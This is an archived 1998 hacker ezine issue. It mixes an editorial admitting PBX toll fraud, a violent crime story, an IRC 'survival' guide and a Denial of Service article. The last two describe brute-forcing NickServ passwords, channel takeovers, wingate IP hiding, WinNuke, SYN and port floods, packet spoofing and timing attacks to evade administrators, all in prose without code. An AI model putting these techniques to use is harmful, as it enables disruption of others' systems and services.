💾 Archived View for clemat.is › saccophore › library › ezines › textfiles › ezines › DOJ › doj-00.tx… captured on 2022-01-08 at 15:30:31.
View Raw
More Information
⬅️ Previous capture (2021-12-03)
-=-=-=-=-=-=-
8888888b.
888 "Y88b
888 888 # #### #### #### ##### ##### ## # # #####
888 888 # # # # # # # # # # # # ## # #
888 888 # #### # # # # # # # # # # # # #
888 888 # # # # # ##### # # ###### # # # #
888 .d88P # # # # # # # # # # # # # # ## #
8888888P" # #### #### #### # # ##### # # # # #
.d88888b.
d88P" "Y88b
888 888 ##### ##### #### #### # ##### # #### # #
888 888 # # # # # # # # # # # # ## #
888 888 # # # # # # #### # # # # # # # #
888 888 ##### ##### # # # # # # # # # # #
Y88b. .d88P # # # # # # # # # # # # ##
"Y88888P" # # #### #### # # # #### # #
ISSUE #0 888888
Nov/98 "88b
Thanks to; 888 #### # # ##### # # ## #
rOTTEN 888 # # # # # # ## # # # #
ethercat 888 # # # # # # # # # # # #
Gateways 888 # # # # ##### # # # ###### #
Digital Avatar 88P # # # # # # # ## # # #
Kleptic 888 #### #### # # # # # # ######
.d88P
.d88P" 'The people's choice for Net Terrorism'
888P"
::::::::::: Editor-in-Chief :::: Rue-the-Day :::::::::::
::::::::::: Chief-in-Editor :::: Cronus :::::::::::
::::::::::: Skull Crusher :::: Ed :::::::::::
::::::::::: Ganja Smoker :::: Niall :::::::::::
::::::::::: Head Girly :::: Pinky :::::::::::
E-Mail discordia@Rue-the-Day.net
:The Discordant Opposition Journal Issue 0, October 1998.
All Rights Reserved. Nothing may be reproduced in whole or
part without written permission from the editors. The DoJ is
made public at irregular periods, but don't worry you won't
miss us.
:Contents:
File 1 - Editorial : Rue-the-Day
2 - The Decay of Society : Cronus
3 - The Waiting Becomes Torture : Rue-the-Day
4 - Editor Bios' : Editors
5 - Surviving IRC : Rue-the-Day
6 - Denial of Service : Cronus
7 - Interview with Neonsurge : Cronus
8 - Mixed up Underground : Digital Avatar
9 - Virii Shit : Kleptic
10 - Conclusion : Editors
:Editorial:
Welcome to issue 0 of the Discordant Opposition's Journal. In
this brief editorial I'll be answering important questions like
'just who are the Discordant Opposition anyway?' Naah, I won't
really. What I am going to be writing about though is what this
Journal is all about (and why you should write an article for it)
and 'getting caught' (from personal experience). Myself and
Cronus have been discussing the possibility of getting together
a Zine for some time now, I always liked the idea because I love
writing. So we finally did it, we affiliated it with the Discordant
Opposition (don't ask) and here we are. No amazing story really.
Over the next few issues we hope to bring you some interesting,
thought provoking articles on various topics. that's where you
the reader can help us, we can't write enough to fill the whole
issues, we need reader participation. We'll only release issues
when we feel that we have enough decent material to fill it so
we aren't setting ourselves and schedule for releases.
Anyone who knows me knows that I had a bit of trouble over the
summer, I want to talk a little about that. There's a moral to
the story so read on. I had been using a PBX system to make
calls to friends in the US (I'm in Europe) for six months, I
hadn't been caught. I got careless, a security consultant was
hired and I was caught. It was all settled by paying the money
back, the police were never involved, it was still all a bit bit
freaky though. What I'm basically saying is common sense; just
because you haven't been caught doesn't mean you won't and
don't continue to do something if the risk outweighs the goal
itself. I was also put in an embarrassing situation while jumping
over a wall to go trashing a few weeks ago, that's a story for some
other time though.
Play safely kids...
Rue-the-Day [root@Rue-the-Day.net]
::::::::::::::::::::::::::::::::::::::::::::::::::::::::Nov/98
::: The Discordant Opposition Journal ::: Issue 0 - File 2 :::
::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::
:The Decay of Society:
Modern Society is nothing more then a sprawling cesspool of
corrupt and decaying biomatter. No one has even tried to
regulate society or improve upon it since well before the
invention of moving electrons. The early American's were
pioneers in society. Setting up a culture that was world
respected for decades was no small task. But since the world
wars the huge degraded continent has slowly and constantly
began to fade and decline into the realms of modernly acceptable
decay. As it has declined, the rest of the world has quickly
followed suit. Terrorist nations grasping on this as an
opportunity for more self-destructive ideas and actions.
Religious cults have shot up with rapid and spontaneous
regularity. Freaks and criminals have seized on the widely
available source of modern communications for mass annoyance
and get-rich-quick ideas. Moreover, since the US has declined
in its state of national affairs, other governments have made
conscious efforts to impose like-restrictions on their nations.
Forced regular advertisement both on TV and in print form.
Strong backing for American products over others through the
notion that they are somehow more reliable even though their
source of origin was clearly no where near a place of
American Jurisdiction.
Crimes raising with direct proportion with population increases.
Mortality rates falling in small, manageable countries such as
Britain or France, but raising monstrously in other poorer
nations such as Sudan or Mali. The basis of human life has
gradually vanished as we as a society have decided unanimously
that abortion and permanent contraception is acceptable in
this promiscuous world. Why should we punish for murder and
still accept freely the murder on the smaller level of a foetus
or an embryo? I am not commenting on abortion and the moralities
behind it. I am simply trying to get the reader to think. Why
do we still believe in fictional ideas of an all-seeing all-knowing
father figure such as god, when the thought of leprechauns, demons
and witches were demised years ago?
Society still longs for some sort of protections. They still
live off the idea that someone is still there watching them and
looking after their best interests. God is a fictional character,
and it only still exists because society can't give up their over
powering father figure. People need someone to chastise them, look
after them and even nurture them. By not realising that they are
clinging on to an archaic image, they are living in the past without
understand that the future is clearly what needs to be looked after
and protected.
Society has to awaken from its age-old slumber and release that it
needs to look after itself and live up to expectations. Drop the
phantasmal theories, re-embellish the value of human life and step
in the reality that we have created around ourselves...
Long live paranoia...
Cronus [cronus@iol.ie]
::::::::::::::::::::::::::::::::::::::::::::::::::::::::Nov/98
::: The Discordant Opposition Journal ::: Issue 0 - File 3 :::
::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::
:The Waiting Becomes Torture:
Small squares of skin were being cut from Levistus's arm with
delicate precision. Lev wasn't quite sure whether this was part
of the interrogation or just something to get his assigned
torturess in the right frame of mind. Either way she seemed
happy, she noticed his regained consciousness and a grin flashed
across her face. All Lev could think of doing in response was
arch an eyebrow, the heavy straps made it impossible to move
anything else really. She shrugged and went back to concentrating
on his arm.
Pain was something he hadn't felt in quite a while. He'd had
most of the pain receptors in his brain fried long ago for the
sake of convenience. He'd gotten a cheap job done, his nerves too
had been cauterised. It did have its drawbacks though. He'd once
almost bled to death before realising that somebody had shot him
in the leg. The drawbacks are probably outweighed by the ability
to endure almost anything though. At least in Lev's opinion they
are. He did feel a vague tingling in his arm as the scalpel danced
over his exposed skin. He almost found himself savouring the meagre
sensation.
He quessed that this would leave his arm looking like a miniature
chessboard or something. What the fuck, another conversation piece.
Torture was becoming a ridiculous business he reflected. What could
you do to people who could barely feel? Mind altering drugs were
out too, those receptors removed long ago. Only the most potent
hallucinogens had any effect on him, LSD gave him a mild headache.
He could feel the cold table under his naked body and the arm
puddle of blood forming around his left arm. He ignored he discom-
fort he was feeling and thought back to the Norland Allied Bank job.
Where things had started...
***
Levistus' contemporaries lacked initiative when it came to technology.
A few pretty basic precautions can do wonders for the operational
integrity of a bank robbery. Anything above and beyond the basic and
success is almost guaranteed. Levistus handled the tech aspect, the
two other members of his crew were Whitie and Mesh. Whitie was a
weapon nut, a kind of 21st century samurai. His nickname came from
his peroxide white hair and pale complection. Mech drove the gateway
cars, she was a speed freak in every sense of the two words.
The bank had only had two security gaurds. Arrogant bastards, they
obviously weren't expecting to get hit, their mistake. Levistus and
and White had walked into the back exuding confidence. The interior
was a stark nightmare of chrome and pale marble all lit by harsh
florescent lighting. Apparently this was stylish. It wasn't a busy
time for the bank, there were only a few individuals queuing and
milling around. Two visible security guards.
Well before entering the bank Levistus had taken the precaution
of knocking out the phone lines in the bank's immediate vicinity.
Lev and Whitie sat down on a leather couch supplied for weary bank
patrons. Lev got out his scanned and his earphones and began to
listen. It seemed that there was very little police activity in
the area. The hissing silence was only occasionally broken by
murmured resports of traffic violations and the saga of a messy
case of domestic violence. Typical shit really. Dull and mundane.
The second instalment of this story will be in the next issue...
Rue-the-Day [root@Rue-the-Day.net]
::::::::::::::::::::::::::::::::::::::::::::::::::::::::Nov/98
::: The Discordant Opposition Journal ::: Issue 0 - File 4 :::
::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::
:Bios':
Nick: Rue-the-Day
E-mail: root@Rue-the-Day.net
Reason behind nick: Most people who know me would probably
agree that an old, archaic English phrase that's fallen into
disuse is suitable for me. Actually I do see 'rue' used a
fair amount, always brings a smile to my face. Usually in
fantasy or sci-fi books, but that's okay. Incidentally 'rue the
day' means to regret a past misdeed or action, glad we've
got the cleared up.
I guess that I have to ask myself two questions; 'What do I
want to tell people about me?' and 'What do people want me
tell about myself?'. I think the answer to both is 'as little
as possible'.
Brief physical description (for those that care). I'm tall
(6'3"), thin and pale. I wear a lot of black, I'm generally
the kind of guy that people refuse to sit next to on public
transport. It has something to do with my self-perfected
aura of menace, I think...
I'm involved in the Kevin Mitnick campaign, I'll be talking
more about that in future issues, I feel that is very impor-
tant. At this point I'm primarily interested in hacking
although I do still phreak (when I need to). I'm quite fond
of Unix, definitely as an alternative to Windows.
Nick: Cronus
Reason for nick: Cronus was a Greek mythological God. He
was God of the skies and also ruler of the Titans. The nick
is my celestial ego trip...
Background: I got involved with computers at an extremely
young age and taught myself to program. This progressed to
going on-line for the first time as a teenager. I have been
learning and understanding ever since I first sat in front
of a computer and the net was simply on outlet for that. I
quickly got interested in hacking and my knowledge grew and
still is growing.
Ethos: I live by firm ethics of never damaging and never
taking money. Victims are not just there, they are man-made.
Areas of interest: Computer security, both Unix and NT.
Also programming and freelance web design (something has to
pay the bills).
Description: Hmm... tall, big and scary or so I'm told. My
eccentric personality is to my credit and my heavy sense of
morals to my advantage.
Current projects: This Zine namely, but also my site is
getting a major over-haul; http://homepages.iol.ie/~cronus
and I am actively securing a few servers (from the outside).
::::::::::::::::::::::::::::::::::::::::::::::::::::::::Nov/98
::: The Discordant Opposition Journal ::: Issue 0 - File 5 :::
::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::
:Surviving IRC:
By Rue-the-Day
http://www.Rue-the-Day.net/
This focus of this article isn't really about 'hacking' IRC in the sense of
the word that most people use, it can be used to give people ideas on ways
to exploit flaws on IRC though. When I think about hacking I don't just
think about things I can use, I also like to try to think about what others
may use against me. I spent a fair amount of time on IRC and became familiar
with a lot of the pitfalls that people find themselves in, I decided to write
this article to make people aware of them. I'll cover various ways in which
you can help to decrease the chances of anything too damaging happening to
your system while on IRC. All of this is taken from my own experience [not
usually as a victim though], I hope it helps a few people out.
Your choice of Client.
To connect to irc you need an irc 'client'. What the client does is provide
an interface between you and the IRC server. There are many clients out
there but a few are used more than others.
My personal choice is 'XiRCON', which I would recommend you check out. Its
homepage is http://www.xircon.com and you can also get other stuff to do
with it like scripts from there. The most popular IRC client is mIRC but as
a consequence there are a lot of well documented security flaws in it, I
would not consider it anywhere near as good as XiRCON. Even the latest
versions of mIRC can be frozen by 'Hanson' programs and all of the earlier
versions are vulnerable to other attacks as well. XiRCON has a lot of
nice features, it allows multiple server connections easily and uses tcl
for it's scripting language which is also used in X-Windows. Give it
a look and see what you think.
Your choice of IRC Scripts.
When you're looking at what you want from an irc script there are some
basics that you definitely need such as a link looker to detect netsplits
and rejoins and mass modes for kicking and banning, other options are also
good. Most scripts have a lot of features that you would probably never need
and if you want one that does something specific the chances are that it
already exists, if you can't find it then write it yourself! Another
important feature is a nice and easy wingate connector but more on that
later. A very cool friend of mine once said 'The best script you can have is
the one you coded yourself.' and he was right.
The script that I use, penance, is one that I've coded some of myself and
kludged together from various other scripts that I liked. It has a ctcp cloak,
a fake version and general ctcp reply sender, link looker and nethack
detector as well as some other stuff, the point is that even though the
features it has aren't incredible by any means I get by with it well. You
don't need everything with bells on because chances are you won't get a
chance to use half of it, when it comes down to it go for practicality over
all else.
There are loads of script archives available on the web although a lot of
them have very questionable quality stuf to offer. It is also worth noting
that popular war scripts like 7th Sphere are now k-lined from most of the big
servers. I have also heard that 7th Sphere has a trojan feature which allowed
it's creators to eavesdrop on people using the script. This is important to
consider, many scripts have inbuilt features that you may not be aware of,
some will change your username without you being aware of it ['oh, I was
wondering why none of my aops were functioning...'] and some allow others
to see who else is using the same script on that particular server. Some
scripts have sections in them commented out and others ahve features that
will only be obvious from taking the time to glance over the code, take the
time to do that - get to know the scripts you use. Some scripts will claim
various things like deop protection or ban protection but aren't coded
properly and therefore can't do what they claim to, others are full of bugs
and shouldn't even be released as beta tests - don't place trust in scripts
like this. Choose scripts that work and make sure that the features you'll
want to use function as they should.
Wingating.
Anonymity can be hard to achieve on irc, if people know you're ident then
pretending to be someone else isn't easy. For instance when I'm on irc my
ident will be something along the lines of 'Rue-the-Day
Rue-the-Da@p155.portlaoise1.tinet.ie'. With just that information you can
narrow down my location to Ireland and even within that to an area around
the Portlaoise node for tinet. So how would I conceal my location? Wingating.
Wingating allows two computers to share a connection, when it is first
installed it has certain defaults running. Like all defaults they aren't
necessarily ones that you'd want to leave active, careless admins leave
them running though. You can use a wingate to bounce your connection to irc
through and therefore appear to be coming from wherever the wingate is set
up, for instance I could be 'Rue-the-Day Rue-the-Da@prairienet.nz' or
wherever I could find a wingatable connection.
You can search for wingates by putting an ip string into a domain or port
scanner and scanning for port 23. Domain scanners can be found by searching
the web. Once you've found wingatable servers you can then connect to them,
this can be done manually or through a script. To connect in mIRC type
'/server wingate.ip' and then '/quote irc.chat.net 6667' next type '/quote
user blah blah blah@server.net blah' and finally '/quote nick yournick'.
The method of connection is similar in XiRCON and there's a script to do it
at my site [http://www.Rue-the-Day.net/] that does it as well, written by a
friend who wishes to remain anonymous.
Netsplits, Link Looker and Nethack protection.
What is a netsplit? A netsplit is when a specific server [or servers]
splits away from the main server. When this happens [and if you have a
script with Link Looker built in] you will be notified, some versions also
tell you who split off with the server as well. If a person connects to a
server that has split and join a channel that she wishes to hack and nobody
else is there then she will be opd. When the server reconnects then she will
be opd in the channel and will then have to try to get rid of the other ops.
I spent most of my time on DALnet so I'm not sure waht it's like on some of
the other servers but when I was there netspklits were very common, we had
thirty five at one time once - it was almost every server.
A lot of the XiRCON scripts I've seen [including my own, 'penance'] have
'Nethack protection' which basically monitors for anyone riding in on a
split server and deops them or devoices them, it will also warn you if the
person joins from a split even if they didn't get oped or whatever.
This combined with Link Looker means that you are constantly aware of
anything going on to do with netsplits. Bots can also be set up to detect
attempted take overs and defend the channel be deopping the person riding
in on the split.
With XiRCON you can connect to another server in a different window and so
be on both sides of the split at the same time, this is also very handy. It
means that you can see what's going on in the channel that you want to take
and also who you'll need to deal with to gain control of the channel.
Denial of Service attacks [DoS].
Denial of Service in one of it's most basic forms is the 'nuke' or 'icmp
bomb'. Although a lot of people out there are patched it's a continual
source of amazement to me the large numbers who aren't.
Denial of Service attacks mostly work by sending signals to your computer,
an example being OOB [out of band data] which will cause net disnconnection,
a system error or the closing of certain connections. Ping floods are another
common attack used to slow or cut off people's access. When supplied with a
target ip a ping flood program will send successive ping requests consuming
a huge amount of bandwith and will either result in lag for the victim or a
ping timeout.
Patches are available to block the flaws that some of the various DoS
attacks use, programs such as 'nukenabber' are also on the web and offer
further protection. Port watchers will monitor for attempted DoS attacks
and warn you of the attempts, some also log the details of the attack for
furure referance. Using unux to go on IRC makes you invulnerable to a lot
of the more common methods of attack out there and gives you access to
DoS attacks like LaTierra and commands like ping -f, XiRCON is available for
Linux under the name 'ZiRCON' and while I haven't tried it out I've been
told that it's pretty cool.
While I could go really in depth into the mechanics of how and why DoS
attacks work it would really require a full article to do so.
[Psst, check the Zine...]
Precautions you can take.
This is just a bunch of stuff that I've found useful during my time on irc.
If somebody asks you for an address that they can email you at and you
aren't sure that you trust them not to turn on you and email bomb you on
some later date what do you do? You don't want them to have your actual
email address - set up a freemail account and give that address out to
people, a usa.net account, like rue-the-day@usa.net, can be gotten at
http://netaddress.com/ or a hotmail account can be gotten at
http://www.hotmail.com.
Accepting files from people you don't know very well can be dangerous as
well, if somebody offers 'nuke protection' or some cool sounding program be
very dubious as to it's true function. One of the programs that it could in
fact be is 'Evilftp' which allows somebody to ftp to your computer through a
password protected port and do basically whatever they want to your box, be
wary. Back Orifice is another and it is simply a good idea not to accept any
files from people you don't know.
Some channels have bots or scripts that will send private messages to
anyone entering the channel set up to say things like 'for a list of the
files available from the #whatever fileserver type '/who *'. This is a
particularly easy 'attack' because it's one you do to yourself. Typing
'/who *' gives you a listing of all the people on whatever server you're on,
like the whole of DALnet or EFnet or whatever. This completely floods you
and results in a dead socket and your disconnection from irc.
A healthy degree of suspicion can be a good thing on irc. I have seen
attempted takeovers of channels in which I'm opd by very convincing
IRChackers posing as friends. People on DALnet especially are guilty of
having far too much faith in the services that the server provides, nickserv
and chanserv. For instance if an enemy of mine decided to use my identity on
irc to take over a channel in which I'm a trusted regular he could use a
wingate to approximate my ident, let's say he managed
'Rue-the-Day Rue-the-Da@dubexs.iol.ie' now people would see the '.ie' and
assume it's me, anyone from Ireland or who pays attention to such things
would know that my isp was 'tinet' not 'iol' and that I wasn't in Dublin
but all it would take is one person to believe it long enough to op the
fake 'me' and the channel would be taken. One way to get around this is to
do your best to remember people's idents but then a lot of people spoof and
mess around with wingating and vhosting anyway so that isn't too easy to do,
some people maintain databases of their friends idents and can access them
easily through irc scripts.
That's even easier on servers like Undernet or EFnet where anyone can nuke
somebody offline and take over their nick. Let's say that the channel that
the person posing as me wanted to take over was on DALnet and my nick was
registered, surely they wouldn't be able to do it right? Wrong. I have heard
of a few ways to hack nickserv and chanserv, some are fact and some are
rumour.
The easiest way to hack nickserv passwords is to run a bot and bruteforce
the person's passsword with a dictionary based attack. If the person doesn't
have nickserv enforcement active then there is nothing to stop you posing as
the person, chanserv won't op you until you enter the person's password but
it should be easy enough to convince people that chanserv is just lagged or
fucked up [all too easy to believe -sigh-] and get them to op you.
Other methods include using database synchs to re-register existing channels,
unsubstantiated but would be easy enough to prove or disprove with a bot or
script. Another method currently being investigated by a friend of mine,
Cronus [http://homepages.iol.ie/~cronus], is an attack to flood nickserv and cause
it to crash making it easier to take over channels.
If you know of any other ways in which to exploit DALnet services or irc in
general I'd be interested in hearing them, please email me any information
you have [root@Rue-the-Day.net]!
The Conclusion
So what am I saying - trust no one? No, I'm just saying that a healthy
amount of skepticism doesn't go astray, if you hear from people that
somebody is going around posing as channel regulars then be suspicious of
people who don't seem right, usually their behaviour gives them away -
somebody who's always polite and cool saying 'op me or dieeeeeee!' suddenly
is a bit of a dead give away.
If you take nothing else from this article at least realise that there are
dangers on irc, try to be aware of them. I hope this helped people to think
about it a little more.
Speaking of helping people out, I'd really appreciate if anyone out there
who knows of flaws or exploits in the various Java chat applets or CGI
scripts which allow web based chat to email me [root@Rue-the-Day.net]
with them for an article I'm writing. Thanks.
::::::::::::::::::::::::::::::::::::::::::::::::::::::::Nov/98
::: The Discordant Opposition Journal ::: Issue 0 - File 6 :::
::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::
:Denial of Service:
by Cronus
Denial of Service attacks are extremely useful and somewhat down grading attacks run over the net. In this article I will explain the different types of DoS attacks, their effectiveness and the sub culture that is associated with them. This file aims to teach you about the different types of attack, how to code them and how to bar against them.
Denial of Service attacks are specific attacks that can be run over the Internet or over a phone line. They attempt to shut down or seriously slow down a service provided by a computer system. By setting up fake connections, exploiting a flaw or flooding a computer with data packets the attack attempts to close the computer down and shut off its services.
The primary and oldest denial of service attack. It is the most original attack and still the most widely used. Essentially the notorious Ping of Death is an attack that slows down the reaction time of the server that is being attacked.
Ping is a technical term used on the net. When you ping a server you send a ping signal to it. The server receives the ping command and responds with a pong signal. Your computer keeps record of the time taken from the ping being sent and the pong being received. The time that is taken for the reply is considered the ping time and that is considered the lag of the server.
The Ping of Death attack simply floods the server under attack with ping requests and lags the server so badly that all its services are seriously slowed down or at worst totally cancelled out. An effective ping attack can actually shut down the server for as long as the attack is maintained.
Protection for the mighty Ping of Death isn't all that simple. All net computers at the moment need to have ping capabilities. On IRC for instance, no ping reply to the IRC server will cause you to be disconnected. Some more modern OS releases come with larger ping buffers in order to catch attempted attacks. They buffer the attacks before replying, this gives them enough time to either send a reply or realise that its an attack and close the port. But again, making the computer think that you are attacking can be good enough to knock a server offline.
This attack is sometimes refereed to as a Win Nuker. Windows uses specific Internet software to operate its network connections. This is called Netbios. Rhino9 have done an excellent file on Netbios and its flaws. It is particularly venerably on ports 137, 138 and 139. Connection to them can cause serious errors in Windows. NT has been known to crash with these flaws and 95 has been reported to freeze or loose the net connection.
Out of Bandwidth is a standard error message that is used by Netbios. It essentially tells the computer that there is no more space for the computer's net connection. The computer thinks that the signal was received from the Internet provider and so drops the line. If you send random data to any of these ports, it is very likely that the computer will freeze or crash.
Coding a Nuker such as this is extremely simple. Simply write a program that connects to a target IP on either port 137 or 139. Then it should send random data to the open port, followed by the OOB message.
There are patches for this old Windows flaw available from the Microsoft Site. Windows is the only OS that is vulnerable. By updating your version of Winsock you will patch that hole and protect your computer. Because Windows is the only OS that is susceptible to this attack and the fact that a patch is available, it makes it a somewhat obsolete attack. Never-the-less many Windows computers are still unpatched and for that reason it can still be used against certain systems.
ICMP is a protocol that doesn't require a connect such as TCP. You don't actually have to be connected to a computer in order to send it ICMP packets. This protocol is mainly used to set up connections, send error messages and monitor Internet connections.
It is possible to set up an attack using only ICMP error messages. There are several ICMP messages that can be used to close an Internet connection such as;
� DESTINATION UNREACHABLE
� TIME TO LIVE EXCEEDED
� PARAMETER PROBLEM
� PACKET TOO BIG
� SOURCE QUENCH
It you were to send one of these messages to an open ICMP port, it would have the effect of closing the connect and disconnecting the computer from the Internet. Of course you would have
to spoof the source address in order for the server to think the message came from the ISP.
Certain systems are more vulnerable then others. Windows by default have ICMP redirect turned off. This makes it perfectly protected from this type of attack. However, most systems, including UNIX, have redirect turned on. This is because it can be very useful and necessary for a fast net connection. But if you feel at risk it might be necessary to close the ports that are effected. Some research on the topic will get you more information on what you can do to secure your specific machine.
The most modern type of net attack is fragmentation. This can be used on most systems quite easily. It is new attack and is still not used that widely.
Essentially this attacks revolves around IP data packets. Whenever a computer sets up a net connection. It uses data packets to communicate with other computers on the net. This attack sends data packets to a computer that are deliberately fragmented. The packets are incomplete in their content. The computer that receives the fragmented packets sets up a routine to listen for the rest of the packets. While your attack stops sending those packets and starts to send another thread of fragmented packets. As the amount of threads build, the computer under attack slows down and will eventually crash or drop the net connection.
Code a program to do this would require a high degree of programming knowledge. On a UNIX machine, you will need to have root access to run an attack like this because you will need to have raw access to the ports. You will need to code in a low level language for a Windows machine. You will also need to develop some means of optimisation that allows you to set-up multiple threads to speed up the attack.
This attack should be effective on most operating systems. Although some protection have been set-up on some systems, most of them are still susceptible. Even ones that have protection should be vulnerable. While some systems will buckle faster then others, they will all buckle soon enough as long as you maintain the attack for long enough and your connection is fast enough.
While this isn't always considered a denial of service attack. I decided to include it in this file as it can be used as a very effective DoS attack. While mail bombing is only usually used as a form of revenge or retribution, it can be used to crash a server in order to run a successful denial attack.
If you wanted to crash a server, you might find in your research that it handles the SMTP protocol. This would open up the possibilities of mail bombing the server. If you were to bomb the target computer with a huge amount of mail messages, you might be able to flood the computer and choke up its hard drive space. The more space you take up, the more lagged the server will become and if you keep up your attack you will eventually cause the computer to crash due to lack of HD space.
There isn't really any way of protecting against a mail bomb attack. If your computer needs to have mail capabilities, you can't close the mail ports. It is possible to set up a mail buffer to try and catch the attack. All operating systems are vulnerable to an attack of this sort. But more modern systems are set up in more advanced ways in order to catch possible attacks, but no way is perfectly secure.
All operating systems have been found to contain security holes. Some of this holes can cause simply annoyances, others are serious flaws in the system that can cause it to crash or freeze. If you are aware of the system that you are attacking, then you will be able to find a hole in that system to exploit.
Windows NT is one of the most modern server software packages that has been released. It can turn a normal computer into an Internet Server. This drastic upgrade means that it has become very popular among small companies that need to run a low cost server on the net. It has several very well documented holes that can be used against it.
Certain UNIX routines are known to contain flaws that can exploited without actually have access to the server. They can be accessed over the Internet making an attack very easy. Certain deamons such as sendmail are widely known to contain flaws in its programming. Searching for these exploits would give you the direct capabilities to attack the server.
Research over the net would be the best way to find exploits for specific systems. While most DoS attacks are general attacks, that need to be directed at a certain OS, some are unique and these need to be researched.
Port flooding is when your attack centres around flooding a certain port with multiple connections. This attack specifically floods a port with so many connections that the target computer is severely lagged that it starts to drop its other connections.
UNIX machines have a process table that contains a list of all the programs that are currently running on the machine. If you were to flood the process table with dozens of invocations of a specific program, you will start to slow the sever response time down. For instance, if your attack were to make multiple connections to port 25 on a UNIX machine. You would flood the process table with lots of invocations of the sendmail program. This will soon start to disconnect other connections. And as the other programs die off, the attack would flood the free space, this would mean that the computer wouldn't be able to host any more connections or internal programs.
A port flooding program can very easily be written. It would connect to the target computer with as many possible connections as your computer can handle. You would need to maintain the flooding for as long as the attack was necessary. If the program was starting sendmail routines, it would simply connect to the target computer on port 25 and then would hold the connection without sending an data. The attack would hold the connection till the target computer cut you off.
The SYN - ACK protocol is a 3-way handshake for setting up Internet connections. A computer sends a SYN packet to the server. The server receives the SYN and responses with an ACK packet. The connection is now set up and running.
The SYN flooding attack is based on an incomplete handshake. The attacker sends a SYN packet from his computer to the server under attack. The server responds with an ACK packet to acknowledge the connection. Then the attack would simply send another SYN packet and wait for the server to respond. By flooding the server with connections that don't actually send any information, you will start to lag it and perhaps even crash it. The Internet stack will wait a certain amount of time before dropping the connection, a SYN flooding attack will therefore keep setting up connections faster then the computer under attack can drop them.
And by doing so can crash the server quite easily.
There is no real way of securing a server from this type of attack. The problem lies in the fact that the SYN - ACK connection is a necessary protocol for a net server. Without it, it would be severely restricted in its on-line transactions. But by restricting the number of possible connections at any one time, you drastically reduce the chance of there being a problem.
There are certain services that are available only on specific servers that you may need to attack. If the service is unique enough you may have some difficulty actually attacking it. One example is the services.dal.net server. It runs the services that are provided for the DalNet IRC network. ChanServ, MemoServ and NickServ are very unique services that are run from this server. These services can be accessed from anywhere on the DalNet IRC network. Hundreds of connections are consistently connected to DalNet and all these people are using the DalNet services repeatedly. To take over an IRC channel on DalNet you might want to shut down ChanServ. To do that you would need to research the service and find a hole in it that you can exploit. You may be able to research a little to find software similar to it that has some exploits already documented.
Most DoS attacks are run from your own computer. Unless you want a pesky system administrator ringing you the next day, you will need to find some way to hide your location from the target computer that you are attacking.
IP spoofing is the hardest thing that can be done these days in the world of hacking. There are several ways to hide your location from the log files on a target computer. Some are more appropriate then others because of the advantages and disadvantages.
Wingating is the most widely used bounce technique. It involves connected to a computer that is running the Wingate program, so can then bounce off that computer and route your connection to another computer. This isn't really a choice for DoS attacks, because these attacks usually reply on speed for the attack. Wingate systems are slow and lagged on their own, your added connection won't help.
IP packet spoofing is the next possibility. It involves creating an attack that actually sends packets of data that spoof the original IP address. This can't be achieved in a Windows environment, because Windows controls too much of the net interface. It is much easy to accomplish in on an UNIX machine as when you are programming you can have access to the raw sockets. As you can specify exactly what you want to send to the network output you can exactly choose the information to send out. You can even send a specific IP address that you wish the packets to seem to come from.
All you need to make a successful attack is a little information on the server. You should probably try to log onto the server as a Guest account and try to gain as much information as you can. You will need to have the operating system information and a list of the software running internally or on the ports of the server. Search for techniques to exploit the server and its software.
Once you have the necessary information or utilities you can attack the server. You will probably want to choose a time for the attack that would be could for your net connection. A time that your ISP won't be too bogged down with connections. Also a time that the net won't be flooded with users. The more relaxed the Internet is, the faster your connection will be and the faster your attack will go. You need to select a time that will allow you to have enough time on-line to complete the attack and go ahead with whatever you intend to do after the server drops.
There are lots of websites that discuss server exploits and software holes. You can search for information on the software and you should be able to find the necessary techniques and information for attacking the server. Here are a few;
� http://www.rootshell.com
� http://www.cdc.com
� http://www.warforge.com
Also check out my site http://homepages.iol.ie/~cronus for updates.
::::::::::::::::::::::::::::::::::::::::::::::::::::::::Nov/98
::: The Discordant Opposition Journal ::: Issue 0 - File 7 :::
::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::
:Interview with Neonsurge:
What are your main underground interests ?
NeonSurge : WindowsNT Security (anything affecting Microsoft Products
really). New Crypto mechanisms are always of interest. And corporate
espionage and sabotage is neat.
How long have you been involved in that activity ?
NeonSurge : Since 1984
How did you get involved in the net underground ?
NeonSurge : That's a really long story. It started locally for me in my
hometown along time ago. At the time, the net wasn't really much...
Everything was text based and not as pretty (that's a joke). At the time
private BBS and VMB's were the big thing. You would get updates as to
the new shit to try via listening to other peoples VMB's. At that time
my stomping ground was SprintNet (x.25). From there it was a natural
progression to what I do today I suppose.
How did you learn ?
NeonSurge : Reading. Playing. Reading. Reading. Reading. Playing.
What advice would you have for a beginner in the underground ?
NeonSurge : See Above.
Do you feel that the underground community has evolved in a good
or bad way ?
NeonSurge : For the most part I think it has evolved in a bad way. No
one really shares information anymore, which is a sad thing.
The only good way in which the scene has evolved is the availability
of the information that is shared.
Do you wish to publicly admit any criminal activities relating
to the net ?
NeonSurge : No. Not at this time, thanks...
Is there any thing you would like to pass on the net community ?
NeonSurge : Don't be stupid. Don't be afraid to learn new technologies,
Unix and Linux are not everything.
Do you have anything you would like to add ? A quote perhaps ?
NeonSurge : Don't eat the big white mints.
Contact Information ?
neonsurge@hotmail.com
http://rhino9.ml.org
::::::::::::::::::::::::::::::::::::::::::::::::::::::::Nov/98
::: The Discordant Opposition Journal ::: Issue 0 - File 8 :::
::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::
:The Mixed Up Underground:
Hacking as we know it is very mixed up. There are so many people trying to
be hackers [I'm going to refrain from the word wannabe] that only some make
it to that goal. The rest get lost somewhere in the void between. The best
way to stop hacking is never to start. Hacking isn't a bad thing. But its a
commitment. Like having a family or something. My best advice to newbies is
not try to learn how to "hack". I suggest learning about computers. Have
fun with them. Set up a network. Use Windows for all I care. For all anyone
cares. Those who say the first step to becoming a hacker is setting up
Linux are stupid. They should be thrown out to the dogs. Most newbies don't
even know what UNIX is and trying to explain that Linux is a version of
UNIX written by Linus Torvalds originally from a modified from of Minix and
that it runs on Intel based home computers with a partition which allows
multiple operating systems is pushing it. Woah. If a newbie understands
that then they should go work for NASA and help return our glorious urge
for space exploration back to what it used to be.
In my opinion, if a person feels the need to become a hacker or push their
